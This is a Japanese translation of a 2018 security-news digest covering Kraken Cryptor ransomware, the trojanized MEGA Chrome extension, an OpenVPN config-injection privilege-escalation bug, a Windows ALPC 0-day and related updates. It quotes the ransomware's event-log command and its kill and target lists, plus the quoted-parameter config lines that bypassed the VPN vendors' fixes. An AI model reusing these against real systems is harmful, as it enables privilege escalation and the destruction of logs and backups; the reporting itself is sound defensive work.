     CCleanerはユーザの設定を無視し、アップデートのインストールを強制しているので、あなたが、アップデートを無効にしたいのであれば、CCleanerと共にインストールされているCCUpdate.exeと名付けられている実行ファイルを削除する必要がある。
     CCleanerがインストールされるとき、CCleanerは、CCleanerのアップデートをインストールするために使用されるこのファイルを C:\Program Files\CCleaner\CCupdate.exe にインストールする。このプログラムは次に、CCleaner Updateと呼ばれるScheduled Taskによって毎日自動的に稼働するように設定されている。


    CCleanerアップデート・スケジュール・タスク

     このプログラムを実行させないようにするには、スケジュール・タスクを削除しなければならない。更に安全にするために、C:\Program Files\CCleaner\CCupdate.exe 実行ファイルを削除することができる。
     このタスクと実行ファイルが削除されると、CCleanerは、あなたが実際に新しいバージョンをインストールした場合を除いて、最早アップデートされることはない。


    Kraken Cryptor身代金要求型マルウェアはSuperAntiSpywareセキュリティプログラムを装っている
    BleepingComputer : News>Security (2018/09/14)
     Kraken Cryptor身代金要求型マルウェアは、2018年08月にリリースされた新しい身代金要求型マルウェアである。Kraken Cryptor 1.5と呼ばれるバージョンは、最近リリースされたものであり、ユーザを欺き、このマルウェアをインストールさせるために正当なSuperAntiSpywareアンチ-マルウェア・プログラムのように装っている。

    SuperAntiSpywareのように装うKraken Cryptor身代金要求型マルウェア 1.5

     Kraken Cryptorがリリースされて以来追跡し続けているMalwareHunterTeamは、今朝、新しい変種を発見した。VirusTotalにエントリして調査しているとき、彼は、Kraken Cryptorインストーラは superantispyware.com から直接配布されているとVirusTotalが通知していることに気づいた。


    VirusTotalによって通知されたダウンロードURL

     正当なSuperAntiSpyware Freeインストーラのファイル名は、SUPERAntiSpyware.exeと名付けられている。Kraken Cryptorインストーラは、SUPERAntiSpywares.exeと名付けられていたことでVirusTotalに発見された。二つの名前の唯一の相違点は、悪意ある実行ファイルには"s"が追加されていることである。この悪意ある実行ファイルは最早、uperantispyware.comから利用することは出来ない。
     あなたは、Kraken Cryptorが以下に示したように同じアイコンを悪用してSuperAntiSpywareを装おうとしている方法を確認することができる。


    SuperAntiSpywareと同じアイコンを使用しているKraken Cryptor実行ファイル

     重要なことは、SUPERAntiSpyware.exeの実行ファイルは改竄されておらず、SuperAntiSpywareの正当なバージョンのインストールは継続されていることに注意することである。通常のリンクを介してSuperAntiSpywareをインストールしたユーザは影響を受けない。現時点で、我々は、ユーザがどのように悪意あるSUPERAntiSpywares.exe実行ファイルに誘導されるのか分かっていない。BleepingComputerは、eMail、電話、TwitterでSuperAntiSpywareにコメントを求める多くの試みを行ったが、この記事の公開の時点で回答を受け取っていない。

    開示: BleepingComputer.comは、SuperAntiSpyware.comや他のアンチ-マルウェア製品と提携している。

    Kraken Cryptor身代金要求型マルウェアがコンピュータを暗号化する方法

     Kraken Cryptor身代金要求型マルウェアは、エクスポートが簡単な組み込み型の設定ファイルによってどのようにコンピュータを暗号化するかの詳細な理解を提供している。この設定ファイルは、モジュールのリストや、モジュールが組み込まれたいた場合には、停止するプロセス、公開暗号鍵、eMail、身代金、暗号化用拡張子、スキップするファイルとフォルダ、暗号化されない国と言語等が含まれている。
     以下に設定ファイルの一部を示す。


    Kraken Cryptor 1.5の設定ファイルの一部

     実行されると、この身代金要求型マルウェアは、以下にリストされている一連のステップを実行するが、リストは正確に実行される順番にはなっていないかもしれない。
     この身代金要求型マルウェアは、C:\ProgramData\Safe.exeと呼ばれるファイルを作成し実行する。このプログラムは、全てのEvent Viewerのログのリストを列挙し、その出力をC:\ProgramData\EventLog.txtファイルにリダイレクトする。

    C:\Windows\system32\cmd.exe /c wevtutil.exe enum-logs > "C:\ProgramData\EventLog.txt"

     このプログラムは、次にこのEventlog.txt中にリストされた全てのログを削除する。
     Kraken Cryptorはまた、犠牲者の言語と所在地をチェックし、以下の国々に存在しているのであれば、そのコンピュータを暗号化しない。

    アルメニア、アゼルバイジャン、ベラルーシ、エストニア、ジョージア(以前のグルジア)、イラン、キルギス、リトアニア、ラトビア、モルドバ、ロシア、タジキスタン、ウクライナ、ウズベキスタン、ブラジル

     プロセスがデータベースを開いたままにすることを防ぎ、暗号化を出来ないようにするために、この身代金要求型マルウェアは、以下にリストされているプロセスを終了する。

    agntsvcagntsvc, agntsvcencsvc, agntsvcisqlplussvc, dbeng50, dbsnmp, firefoxconfig, msftesql, mydesktopqos,
    mydesktopservice, mysqld, mysqld-nt, mysqld-opt, ocomm, ocssd, oracle, sqbcoreservice, sqlagent, sqlbrowser,
    sqlservr, sqlwriter, sqlwb, synctime, tbirdconfig, xfssvccon

     コンピュータを暗号化しているとき、以下の拡張子に関してコンピュータをスキャンする。

    1cd. 3dm. 3ds. 3fr. 3g2. 3gp. 3pr. 7z. 7zip. aac. ab4. abd. accdb. accde. accdr. accdt. ach. acr. act. adb.
    adp. ads. agdl. ai. aiff. ait. al. aoi. apj. arw. ascx. asf. asm. asp. aspx. asx. atb. avi. awg. back. backup.
    backupdb. bak. bank. bay. bdb. bgt. bik. bin. bkp. blend. bmp. bpw. c. cdb. cdf. cdr. cdr3. cdr4. cdr5. cdr6.
    cdrw. cdx. ce1. ce2. cer. cfg. cfn. cgm. cib. class. cls. cmt. config. contact. cpi. cpp. cr2. craw. crt. crw.
    cs. csh. cs. csl. css. csv. dac. dat. db. db3. dbf. dbx. db_journal. dc2. dcr. dcs. ddd. ddoc. ddrw. dds. def.
    der. des. design. dgc. dit. djvu. dng. doc. docm. docx. dot. dotm. dotx. drf. drw. dtd. dwg. dxb. dxf. dxg. edb.
    eml. eps. erbsql. erf. exf. fdb. ffd. fff. fh. fhd. fla. flac. flb. flf. flv. flvv. fpx. fxg. gif. gray. grey.
    groups. gry. h. hbk. hdd. hpp. html. ibank. ibd. ibz. idx. iif. iiq. incpas. indd. info. info_. ini. jar. java.
    jnt. jpe. jpeg. jpg. js. json. kc2. kdbx. kdc. key. kpdx. kwm. laccdb. lck. ldf. lit. lock. log. lua. m. m2ts.
    m3u. m4p. m4v. mab. mapimail. max. mbx. md. mdb. mdc. mdf. mef. mfw. mid. mkv. mlb. mmw. mny. moneywell. mos. mov.
    mp3. mp4. mpeg. mpg. mrw. msf. msg. myd. nd. ndd. ndf. nef. nk2. nop. nrw. ns2. ns3. ns4. nsd. nsf. nsg. nsh.
    nvram. nwb. nx2. nxl. nyf. oab. obj. odb. odc. odf. odg. odm. odp. ods. odt. ogg. oil. omg. orf. ost. otg. oth.
    otp. ots. ott. p7b. p7c. p12. pab. pages. pas. pat. pbf. pcd. pct. pdb. pdd. pdf. pef. pem. pfx. php. pif. pl.
    plc. plus_muhd. pm!. pm. pmi. pmj. pml. pmm. pmo. pmr. pnc. pnd. png. pnx. pot. potm. potx. ppam. pps. ppsm. ppsm.
    ppsx. ppt. pptm. pptm. pptx. prf. ps. psafe3. psd. pspimage. pst. ptx. pwm. py. qba. qbb. qbm. qbr. qbw. qbx. qby.
    qcow. qcow2. qed. qtb. r3d. raf. rar. rat. raw. rdb. rm. rtf. rvt. rw2. rwl. rwz. s3db. safe. sas7bdat. sav. save.
    say. sd0. sda. sdb. sdf. sh. sldm. sldx. sql. sqlite. sqlite-shm. sqlite-wal. sqlite3. sqlitedb. sr2. srb. srf.
    srs. srt. srw. st4. st5. st6. st7. st8. stc. std. sti. stm. stw. stx. svg. swf. sxc. sxd. sxg. sxi. sxm. sxw. tbb.
    tbn. tex. tga. thm. tlg. tlx. txt. usr. vbox. vdi. vhd. vhdx. vmdk. vmsd. vmx. vmxf. vob. wab. wad. wallet. war.
    wav. wb2. wma. wmf. wmv. wpd. wps. x3f. x11. xis. xla. xlam. xlk. xlm. xlr. xls. xlsb. xlsm. xlsx. xlt. xltm.
    xltx. xlw. xml. ycbcra. yuv. and zip

     一致するファイルに遭遇すると、そのファイルを暗号化し、00000000-Lock.onionの形式でそのファイルの名前を変更する。数値はファイルが暗号化される度にインクリメントされる。オリジナルのファイル名は暗号化され、暗号化されたファイル中に格納される。


    Kraken Cryptorによって暗号化され、-Lock.onion拡張子が追加されたたファイルのフォルダ

     コンピュータを暗号化しているとき、Kraken Cryptorは全てのフォルダ中に # How to Decrypt Files.html と名付けた脅迫文を作成する。この脅迫文は、一意の犠牲者のキーと、0.125 Bitcoin(【訳註】 約90,636円、9月16日14:54分現在)での身代金の支払いを実行するための方法に関する指示を含んでいる。脅迫文中で提供されているコンタクト情報は、shortmangnet@420blaze と BM-2cUEkUQXNffBg89VwtZi4twYiMomAFzy6o@bitmessage.ch である。


    脅迫文の一部

     この身代金要求型マルウェアはまた、SysinternalsサイトからSDeleteをダウンロードし、release.batと呼ばれるバッチファイルを実行する。このバッチファイルは、SDeleteがドライブ上の全ての空き領域をクリアし、ファイルの復元を困難にするために0で上書きすることを発生させる。また、コンピュータをシャットダウンし、Windowsスタートアップ・リカバリを無効にし、Windowsバックアップを削除し、シャドー・ボリューム・コピーを削除する。


    Release.batバッチファイル

     これは、全て犠牲者がファイルを復元することを困難にするために実行される。

    Kraken Cryptor身代金要求型マルウェアを復号することは不可能

     残念ながら、現時点でKraken Cryptor身代金要求型マルウェアの変種で暗号化されたファイルを無料で復号する方法はない。
     暗号化されたファイルを復号する唯一の方法は、バックアップからである。もしくは、あなたが呆れ返るほど幸運だったのであれば、シャドー・ボリューム・コピーからである。Kraken Cryptorは、シャドー・ボリューム・コピーを削除しようとするが、極稀に、身代金要求型マルウェア感染が、何らかの理由からそうすることに失敗することがある。この理由から、あなたが実行可能なバックアップを持っていないのであれば、最後の手段としてシャドー・ボリューム・コピーから暗号化されたファイルを復元するように人々に提案している。
     この身代金要求型マルウェアを論議したい、あるいは、サポートを必要とする人々は、我々の専用のKraken Cryptor Ransomware Help & Support Topicを使用することができる。

    Kraken Cryptor身代金要求型マルウェアから自分自身を守るには

     Kraken Cryptor(もしくは、あらゆる身代金要求型マルウェア)から自分自身を守るには、適切なコンピュータ習慣とセキュリティ・ソフトウェアを使用することが重要である。何よりも先ず、身代金要求型マルウェア攻撃のような緊急の場合に復元可能な、あなたのデータの信頼あるテスト済みのバックアップを常に持つようにしなさい。
     身代金要求型マルウェアは、ハッキングされたリモート・デスクトップ・サービスを介してインストールされることが知られているので、そのバックアップが間違いなく正しくロックされていることが重要なことである。これは、リモート・デスクトップ・サービスを実行しているコンピュータが、間違いなく直接インターネットに接続されていないことを含んでいる。リモート・デスクトップをVPNの背後に置く代わりに、あなたのネットワーク上でVPNアカウントを持つ人々のみアクセス可能にしておくことである。
     アカウントがリモート・デスクトップ・サービスをブルートフォースされることを困難にするために、適切なアカウント・ロックアウト・ポリシー(【訳註】 アカウント・ロックアウトとは、パスワードを設定回数だけ入力ミスした場合に ユーザーアカウントを利用できない状態にすること(今日からはじめるWindows Server 2003サーバー管理入門より))を設定することは重要なことである。
     あなたはまた、身代金要求型マルウェアと戦うために、シグネチャやヒューリスティックだけではなく不正な挙動を検出するセキュリティソフトウェアを持たなければならない。例えば、EmsisoftのAnti-MalwareMalwarebytesのAnti-Malwareは共に、殆どではないが、コンピュータを暗号化する多くの身代金要求型マルウェア感染を検出することができる挙動検出を含んでいる。
     大事なことを言い忘れていたが、適切なオンライン・セキュリティ習慣の実践を確実にしなさい。多くの場合、最も重要なステップである。 
    • ・ ともかくバックアップ
    • ・ 送信者を知らない場合には、添付ファイルを開いてはならない
    • ・ 実際に添付ファイルをあなたに送信した人を確認するまでは添付ファイルを開いてはならない
    • ・ VirusTotalのようなツールで添付ファイルをスキャンしなさい
    • ・ 必ず、全てのWindowsアップデートが出現すると直ぐにインストールすることを確実にしなさい。また、全てのプログラムのアップデートを確実にしなさい。とりわけ、Java, Flash, Adobe Reader。古いプログラムは、マルウェア配布者によって一般的に悪用されるセキュリティ脆弱性を含んでいる。それ故、プログラムのアップデートを維持することは重要である。
    • ・ 間違いなくセキュリティソフトがインストールされていることを確実にしなさい
    • ・ 強力なパスワードを使用しなさい。決して複数のサイトで同じパスワードを使い回してはならない
    • ・ リモート・デスクトップ・サービスを使用しているのであれば、そのコンピュータを直接インターネットに接続してはならない。代わりに、VPNを介してだけアクセス可能にしなさい
     身代金要求型マルウェア防御の完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomwareの記事を訪問しなさい。

    UPDATE: 我々はSuperAntiSpywareから以下のステートメントを受け取った。
     SuperAntiSpywareは、BleepingComputerに、「企てられたSUPERAntiSpywareダウンロードサーバに対する攻撃の結果、悪意あるファイルが、SUPERAntiSpywareダウンロードサーバにアップロードされた。企ての数時間後に悪意あるファイルは発見され、サーバから削除された。それ以来、このサーバは完全にスキャンされ、この脆弱性は修正された」と告げてきた。


    Veeamが詐欺師共のために200GBの顧客データベースをリークした
    Bitdefender : HOTforSecurity (2018/09/13)
     200GBの顧客データを含むデータベース(凡そ4億4千500万レコードが存在していたと見積もられる)が、バックアップ及び復元企業Veeamによってオンラインに漏洩されていた。これは、Amazonにホストされていたサーバーが不適切に安全化されていたことによるものである。
     このデータベースは、名前、eMailアドレス、IPアドレス、参照元URLアドレス、顧客組織規模等を含んでいるかのようである。この発見を通知したセキュリティ研究者Bob Diachenkoは、この情報がフィッシぃング・キャンペーンを実施しているスパマーにとっては大変価値のあるものであると確信している。ただ、重要な金融情報は、database.goldmine中に同梱されていなかったようである。
     データの非機密性を考慮に入れても、このような巨大で構造化され標的化されたデータベースを公的に利用できることは、スパマーやフィッシング詐欺者にとっては宝箱といえる」と、Diachenkoは記述し、更に「とりわけMOngoDBsをターゲットにした新しい身代金要求型マルウェア攻撃の波(昨年よりずっと高額になっている)に、このデータベースが襲われなかったことは不幸中の幸いである」と続けている。
     AmazonサーバのIPアドレスは、Shodan検索エンジン(8月31日から、セキュリティの貧弱なインターネット接続デバイスを同定するために使用されたことで知られている)によってインデックス化されているかのようである。この研究者は9月5日に、この件を通知しているが、このサーバがコッソリとオフラインになったのはDiachenkoとTechCrunchのZack Whittakerが繰り返して通知した後の9月9日であった。
     この全データベースは、2013年から2017年までの情報を含んでいた可能性があり、潜在的にVeeamのマーケティング・インフラに使用されていた。
     「データベース中のコレクション名とデータの解析に基づき、私は当初、Marketoサーバに由来していると推測したので、彼らのeMailアドレスにセキュリティ通知を送信した」とし、続けて「しかしながら、さらなる解析で、このデータがVeeamマーケティング・サーバ・インフラの一部であると結論した」と、Diachenkoは記述している。
     VeeamのスポークスマンHeidi Kroftは、最近「我々は、詳細な調査の実施を継続している。そして、我々の発見したことに基づき適切な行動を取るだろう」と 述べている


    人気のあるVPNクライアントに権限昇格のバグが発見された
    BleepingComputer : News>Security (2018/09/07)
     Windowsマシン上のNordVPNとProtonVPNクライアントが、管理者権限で任意のコードを実行することを防止するためのパッチは、この脆弱性に対して不十分な制御しか実装していなかったことを、セキュリティ研究者が発見した。
     この二つのクライアントは、あるポイントから別のポイントへの安全なトンネルを構築するためにOpenVPNオープンソース・ソフトウェアを使用していた。このサービスは、管理者パーミッションで実行される必要があるので、実行される全てのコードは、この権限を享受している。
     Cisco TalosのPaul Rascagneresは、OpenVPNの設定ファイルが、任意のコードを含ませるように変更することができ、次に、サービスに渡し、Windows環境下でシステム権限で実行することができることを発見した。
     このバグは4月に、OpenVPNサービスが、"plugin"や"script-security"のようなパラメータを含む設定ファイを受け入れ実行できることを示したVerSpriteセキュリティコンサルティング企業のFabius Watsonによって公開されたバグに類似している。
     NordVPNとProtonVPNは共に、この二つのパラメータ並びに"up"や"down"(OpenVPNを介してコードやコマンドを実行する全てのメソッドに存在している)の存在に対するチェックを実装することによって、このバグを修正した。
     設定ファイル構文解析ツールでOpenVPNのソースコードを調べているとき、Rascagnaresは、これらの制御が不十分であり、同じ効果が、引用符間にパラメータを配置することによって達成できることに気が付いた。この研究者は、以下のテキストを設定ファイル中に追加することによって、このことを示した。

    "script-security" 2
    "up" C:\\WINDOWS\\system32\\notepad.exe

     NordVPNとProtonVPNは、Windows上でNotepad(メモ帳)を起動した。


    画像をクリックすると拡大します。

     この二つのセキュリティ・バグは、ProtonVPNに関してはCVE-2018-3952で、NordVPNに関してはCVE-2018-4010で現在監視されている。セキュリティ評価は、8.8である(最悪は、10)。
     Rascagnaresは、7月5日に二つのVPNプロバイダに対して、この欠陥を公開した。NordVPNは8月8日にパッチをリリースし、ProtonVPNは9月3日に修正を提供した。
     今回、二つのベンダは異なる修正方法を選択した。
     「ProtonVPNに関しては、インストレーション・ディレクトリにOpenVPN設定ファイルを配置し、標準ユーザがこのファイルを修正できないようにした。従って、設定ファイル中に悪意ある文字列を追加することは出来ない。NordVPNは、OpenVPN設定ファイルを生成するためにXMLモデルを使用することを決定した。標準ユーザは、このテンプレートを編集することは出来ない」と、Rascagnaresは本日のブログで明らかにしている。
     権限昇格バグの影響を受けるクライアントのバージョンは、ProtonVPN 1.5.1 と NordVPN 6.14.28.0である。NordVPNのユーザは、このアプリケーションの最新のリリースに自動的にアップデートされるが、ProtonVPNのユーザは、手動でこのプロセスを開始する必要がある。

    MEGA Chrome拡張がログイン認証と仮想通貨を盗む目的でハックされていた
    BleepingComputer : News>Security (2018/09/05)
     セキュリティ研究者達は、MEGA Chrome拡張がログイン認証と仮想通貨のキーを盗むために改竄されていたことを発見した。この拡張は、悪意あるものに置き換えられていたことが発見された後、GoogleはChrome Web Storeから、この拡張を削除した。
     このハッキングは、SerHack(セキュリティ研究者であり、Moneroプロジェクトの貢献者)によって発見され、直ちにMEGA Chrome拡張のバージョン3.39.4が、ハックされているとする警告がTweetされた。他のセキュリティ研究者達は、即座にこの拡張の解析に取り掛かり、彼らが発見したことをレポートしている。
     この拡張がインストールされると、Amazon, Microsoft, Github, Googleへの固有のログインフォーム提出物を監視する。


    様々なサイトでのログインの監視(画像をクリックすると拡大します)

     URLがRegisterもしくはLoginの文字列を含むか、もしくは、"username", "email", "user", "login", "usr", "pass", "passwd"か"password"と名付けられた変数が存在するあらゆる形式の提出物の監視を実行する。


    特定の名前の付いた変数を盗む(画像をクリックすると拡大します)

     この拡張が、これらの形式の提出物やデータ変数を検出すると、https://www.megaopac.host/ と呼ばれるウクライナにあるホストに、この認証と変数の値を送信する。


    攻撃者に情報を送信する(画像をクリックすると拡大します)

     この拡張を更に悪いものにしているのは、"https://www.myetherwallet.com/*", "https://mymonero.com/*", "https://idex.market/*"のようなURLのパターンを監視していることである。そして、検出されると、これらのサイトからログインしているユーザの仮想通貨秘密鍵を盗もうとする。


    仮想通貨秘密鍵の捕獲(画像をクリックすると拡大します)

     Chrome拡張アーカイブサイト(crx.dam.io)によると、アーカイブされた最新のバージョンは、3.39.3である。これは、2018年9月2日に存在しており、悪意あるコードは含まれていない。それ故、この拡張は、9月2日以降のある時期に改竄されたことになる。
     研究者は、MEGAアドオンのFirefoxバージョンも検証し、改竄されていないと結論している。

    MEGAをインストールしている場合に実行すべきこと

     BleepingComputerはSerHackに、どのくらい多くのユーザが、この拡張をインストールしているのかと尋ねた。彼は、影響を受けるユーザは160万を超えるだろうと告げてきた。このハッキングは、明らかに多大な影響力を持っている。
     この拡張をインストールしている人々は、即座にMEGA拡張を削除する必要がある。次に、あらゆるアカウントでのパスワードを変更しなさい、とりわけ、金融、ショッピング、銀行、政府施設、その他あなたが使用しているもの。

    MEGAはハックされた拡張に関する声明を発表した

     MEGAは、その声明に於いて、彼らのChrome拡張Web Storeアカウントがハックされた、そして、発生していることを調査中であると述べている。
     「協定世界時2018年9月4日14時30分(日本時間、同日23時30分)、正体不明な攻撃者が、トロイの木馬化したMEGAのChrome拡張(バージョン3.39.4)をGoogle ChromeのWebサイトにアップロードした」と、この件に関しMega.nzのブログで述べ、更に、「インストレーションや自動アップデート時には、昇格されたパーミッション(あなたが訪問している全てのWebサイトでのあなたの全データを読み込み変更できるパーミッション)を要求してくるが、本物のMEGA拡張は、このようなことは要求しない。そして(パーミッションが承認されると)amazon.com, live.com, github.com, google.com (webstoreログイン用), myetherwallet.com, mymonero.com, idex.market, HTTP POSTが他のサイトに要求したものを含む認証情報をウクライナにあるサーバに漏洩する」と続けている。
     彼らは更に、「Googleは、著作者が拡張に署名する機能を削除し、代わりに、この拡張がアップロードされた後、それらに署名するGoogleを信頼しなければならなくなったので、外部からの改竄の発生をより簡単ならしめている」と述べている。
     「我々は、この重大な事件に関し謝罪する。MEGAは、マルチパーティー・コード検証、堅牢なビルド・ワークフロー、可能であれば暗号化シグネチャという厳格なリリース手順を使用している」と、ブログでは述べられている。「残念ながら、GoogleはChrome拡張への著作者のシグネチャを無効にすることを決定した。そして現在、Googleは、Chrome Webストアにアップロードされた後、もっぱら自動的に署名することに依存している。これは外部からの改竄に対する重要な防御壁を削除することである。MEGAsyncと我々のFirefox拡張は、我々によって署名されホストされている。それ故、この攻撃ベクトルによる犠牲者の発生の可能性はない。我々のモバイルアプリケーションは、Apple / Google / Microsoftによってホストされているが、我々によって暗号化された署名がなされているため、同様に影響を受けることはない」と続けている。


    Microsoftが、Windows 10の累積アップデートKB4346783とKB4343893をリリースした
    BleepingComputer : News>Security (2018/08/30)
     凡そ2週間前、Microsoftは8月の定例パッチをリリースした。本日、Microsoftは、以前のパッチで導入された問題を修正するWindows 10の累積アップデートのセットをリリースした。
     Microsoftは今朝、セキュリティ以外の改善と修正を行うWindows 10用の新しい一連の累積アップデートをお披露目している。Windows 10 April 2018 Update(バージョン 1803)とWindows 10 Fall Creators Update(バージョン 1709)を稼働しているシステムは、一般的なバグを修正するこの新しいパッチを受け取るだろう。


    Windows 10アップデート チェック

     更新履歴によると、このアップデートはWindows 10の様々な問題を修正するものである。システムにこの最新のパッチをインストールするには、「設定」を開き、更新とセキュリティ -> Windows Updateと進む。「更新プログラムのチェック」をクリックする。いつもどおり、ここから手動でこのアップデートをダウンロードしインストールすることができる。

    Windows 10 April 2018 Update用Build 17134.254

     現在、Windows 10 April 2018 Updateを使用しているのであれば、KB4346783が、あなたのデバイス用に表示されているだろう。このパッチは、Windows 10 April 2018 UpdateのPCをBuild 17134.254に高める。このパッチはWindows UpdateもしくはMicrosoft Updateカタログからダウンロードすることができる。
     このパッチは以下の修正と改善を行う。

     【訳注】Microsoftサポートサイトのコピー&ペーストのため省略いたします。Microsoftサポートサイト(日本語サイト、2018/08/31時点では英文のまま)はこちらです。このパッチの既知の一つの問題の概要と解決策もこのサイト中に存在しています。

    Windows 10 Fall Creators Update用Build 16299.637

     Windows 10 Fall Creators Updateを依然として使用しているのなら、PCは、KB4343893を得ているだろう。このアップデートは、顧客をBuild 16299.637に高める。このパッチは以下の修正を含んでいる。

     【訳注】Microsoftサポートサイトのコピー&ペーストのため省略いたします。Microsoftサポートサイト(日本語サイト、2018/08/31時点では英文のまま)はこちらです。このパッチの既知の二つの問題の概要と解決策もこのサイト中に存在しています。

     Windows 10 PCのアップデートを維持することは重要なので、このパッチは可能な限り早急にインストールすることが推奨されているが、あなたが、このパッチの適用を遅延したいのであれば、「設定」に進み、「更新とセキュリティ」から、アクティブ時間と再起動オプションを調整しなさい。


    Windows Task Scheduler ALPC 0-Dayの一時的なパッチが利用可能になった
    BleepingComputer : News>Security (2018/08/30)

     今週初め、セキュリティ研究者がTask Scheduler ALPCインターフェースに影響を与えるWindowsの0−Day用の脆弱性攻撃コードをリリースした。本日、サイバーセキュリティ企業Acros Securityが、この特定の0−Dayの悪用を防止する一時的な修正(Micropatchと呼ばれる)を公開した。
     ユーザは、0patch Agentクライアントをダウンロードしインストールすることで一時的パッチを適用することができる。

    Micropatchは最新のWindows 10だけでしか利用できない

     このパッチは、64-bit Windows 10 v1803バージョンのユーザのみしか利用できないと、Mitja Kolsek(Acros SecurityのCEO)はeMail経由で本日BleepingComputerに告げてきた。
     「我々は明日、Windows Server 2016用のMicropatchをリリースする予定である」と、Kolsekは発言している。
     この企業は、明日のブログへの投稿で、企業が0patch以外の方法で彼らのシステムに、このMicropatchを適用したい場合に備えて、このMicropatchの内部動作のより詳細な説明をソースコード共々公開することを計画している。


    0patchのTweet
    @0patch
    Replying to @0patch @SandboxEscaper
    Blog post is in the making but for the impatient, here's the source code of our micropatch. Three patchlets, one calling RpcImpersonateClient, one removing a premature call to RpcRevertToSelf, and one adding a RpcRevertToSelf call where it should be. Just 4 instructions.
    9:49 PM - Aug 30, 2018

     この企業はまた、他の影響を受けるプラットフォームに、このパッチを移植するための提案や要求を探している。「我々は、support@0patch.comで他のバージョンへの移植に関する要求を歓迎している」とこの企業は発言している。

    この0−Dyaは64-bitだけでなく32-bitプラットフォームにも影響を与える

     この0−Dayは、セキュリティ研究者がGitHub上に概念の実証コードを公開し、Twitter上でこの問題を喧伝した2日前(8月29日)に表面化した。この0−Dayは、攻撃者がユーザのデバイス上でゲストもしくはユーザ・レベルからシステム・アクセスで実行するように悪意あるコードのパーミッションを昇格することを可能にするものである。
     GitHub上で公開されたオリジナルの脆弱性悪用コードは、Windows 10 v1803とWindows Server 2016の64-bitバージョンでのみ動作することが知られていた。
     翌日の8月29日、セキュリティ研究者Will DormannKevin Beaumontは、僅かな変更で32-bitバージョンでも同様に動作するように修正することができることをレポートした。


    Will DormannのTweet
    @wdormann
    Replying to @wdormann
    I can't imagine too many people are interested, but I can confirm that with minor tweaks the public exploit code for the Windows Task Manager ALPC vul works on 32-bit Windows 10 as well.
    6:33 AM - Aug 29, 2018

     Microsoftは、いつも通りなんの役にも立たない定型文の回答しか提供しなかったが、Microsoftは、この0−Dayの修正を次回の月例セキュリティアップデート(9月11日、日本時間 9月12日)で修正するであろうと思われていた。
     0−Dayが公開されて以来2日経過したが、悪意ある脅威の悪漢共によってオンライン上で、この0−Dayが使用されたというレポートは存在していない。
     Windowsのフローに対してAcros SecurityがMicropatchを提供したのは今回が初めてのことではない


    Windows Task Scheduler中の未パッチのフローが公開された
    BleepingComputer : News>Security (2018/08/27)
     セキュリティ研究者が、Windows OS中の脆弱性に関する詳細をTwitter上で公開した。
     この脆弱性は、「ローカル権限の昇格」問題であり、攻撃者が限定的ユーザの役割から全システムアカウントに悪意あるコードのアクセスを昇格することを可能にするものである。
     Will Dormann(CERT/CCのエンジニア)は、この脆弱性を確認し、昨晩公式のCERT/CCアラートを発行した。
     Dormanは、この脆弱性がWindows Task Scheduler、より正確にはAdvanced Local Procedure Call (ALPC)インターフェース中に存在していると発言している。
     ALPCインターフェースは、プロセス間通信機能として動作するWindows内部メカニズムである。ALPCは、OS内で実行されているクライアント・プロセスが、同じOS内で動作しているサーバ・プロセスに何らかの情報を提供したり、何らかのアクションを実行するように依頼することを可能にする。
     この研究者(オンラインではSandboxEscaperと名乗っている)は、ALPCインターフェースを悪用してWindowsシステムでシステムアクセスを取得するための「概念の実証」(PoC)コードをGitHub上にリリースしている。
     良性のマルウェア(【訳註】 悪意のある(有害な)ペイロードを保持していないマルウェア(マルウェア情報局より))が多くの既存の方法よりもっと信頼性のあるエクスプロイトを使用して標的になっているシステムの管理者アクセスを取得できるので、マルウェアの作成者はとりわけ、このPoCに関心を持つだろう。
     SandboxEscaperは、この脆弱性をMicrosoftに通知していない。これは、このフローのパッチが存在していないことを意味している。現在、全てのWindowsユーザに脆弱性がある。
     Microsoftの次の定例パッチは9月11日(次のPatch Tuesday)にスケジュールされている。
     この研究者は、この脆弱性を公開した後、彼もしくは彼女のTwitterアカウントを削除している。


    Windows 10 KB4100347 Intel CPU Updateがブート問題を発生している。また、AMDユーザにも強く求めていた
    BleepingComputer : News>Security (2018/08/27)
     8月21日、Microsoftは、5月にリリースしたWindows 10とWindows Server 2016用のKB4100347セキュリティ・アップデートのアップデートをリリースした。このアップデートは、Spectre脆弱性を軽減するIntel CPUマイクロコード・アップデートを含んでいる。このバージョンをインストールした後、ユーザは、Windows 10が適切に起動することができなくなった、あるいはパフォーマンスに問題が発生したと報告し続けている。この問題を更に複雑にしているのは、このIntel CPUアップデートが、AMDプロセッサのユーザにも強要されていたことにある。
     Microsofstは、2018年7月24日以来このサポート記事を更新していないので、8月21日のKB4100347で何が変更されたのか不明である。我々が認識していることは、このアップデートがWindows Updateを介して提供されて以来、Windows 10マシンが起動しなくなった、無限自動修復ループに陥った、あるいは、Choromeや他のアプリケーションで音楽を再生したときパフォーマンスの問題が発生したという多大なレポートである。
     Redditへの投稿によると、ある管理者はXeonプロセッサを使用している殆どのワークステーションに影響を与えるブート問題と理解しているが、他のレポートは、Intel i3, i5, i7プロセッサでも同様に問題を発生していると表明している。


    KB4100347アップデートに関するRedditの投稿

     上のRedditへの投稿はまた、ブートができなくなったシステムに関してWindows Recovery Environmentを使用して、このアップデートを削除する方法も提供している。Windowsはブートできるがパフォーマンス問題を持っている人に関しては、このアップデートをアンインストールし、これが助けになるか否か確認することができる。
     このマイクロコード・アップデートを更に混乱させているのは、5月のアップデートをインストールし、更に最新の8月のアップデートをインストールした人は、KB4100347アップデートが、アップデートの履歴に二つ表示されていることである。


    KB4100347が二つ表示されている画面(Microsoft Forumsから)

    AMDプロセッサのユーザもIntelマイクロコード・アップデートを提供されている

     AMDユーザも仲間はずれにされていなかった。Redditへの投稿によると、KB4100347はIntelプロセッサ用に設計されているが、Windows Updateは、AMDプロセッサを使用しているコンピュータに関しても、このアップデートをインストールしている。
     AMDユーザは、Intelプロセッサを使用している人々と同じ問題に悩まされていないようであるが、MicrosoftはAMDユーザとサポート対象外のIntelプロセッサの使用者にこのアップデートを強要する誤りを犯しているかのようである。
     Bleeping ComputerはMicrosoftに接触し、このアップデートに関する質問をしたが、この記事を公開する時点に於いて回答は得られていない。


    Windows 95がWindows, macOS, Linux用のアプリケーションとして利用可能になった
    BleepingComputer : News>Security (2018/08/23)
     Slackのソフトウェア・エンジニアFelix Riesebergが、Windows, macOS, Linux用のアプリケーションとしてWindows 95をリリースした。これは100MBのElectronアプリケーションであり、Windows, macOS, Linuxコンピュータにインストールし実行することができる。
